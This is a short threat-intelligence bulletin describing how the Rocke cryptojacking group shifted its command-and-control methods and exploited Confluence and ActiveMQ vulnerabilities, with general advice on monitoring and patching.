Threat Watch

Rocke Cybercrime Group Changing TTP’s

Rocke: The Chinese-speaking cybercrime group dubbed Rocke has been around since early 2018 and has carried out various crypto-jacking schemes. In March of 2019, the group began using a Golang-based dropper dubbed LSD that used Pastebin for its Command and Control (C2) servers, according to Anomali labs. The new malware allowed the group to set up Monero (XMR) crypto-jacking operations. Rocke managed to do this with nearly non-existent detection rates by anti-virus products, which was much lower than the detection rates for the group’s malicious tools developed in Python. A month after the Pastebin C2 servers were discovered, the group began exploiting CVE-2019-3396 in vulnerable Confluence servers for remote code execution. This vulnerability allowed the group to drop crypto-miner payloads onto Confluence servers. In July, Rocke switched from Pastebin C2 servers to hosting their own, which allowed them to host their crypto-mining scripts and take them out of the public eye, reducing the chance of the servers being taken down. In September the group shifted their Domain Name System (DNS) text records to store crypto-mining scripts instead of pastes from Pastebin. With all these changes, the group also began to use a different vulnerability known as CVE-2016-03088, which is an exploit against ActiveMQ servers.


This evolution of the Rocke group is a perfect example of how threat actor groups switch their Tactics, Techniques, and Procedures (TTP’s) to evade detection by anti-virus products and security research groups. Cryptojacking is a lucrative crime that groups are continuously trying to leverage for financial gain, and all systems within an organization should have some type of monitoring on them to detect when this is occurring. In this case, the group is also utilizing old exploits that would not be able to be used if systems were up-to-date on all their security patches.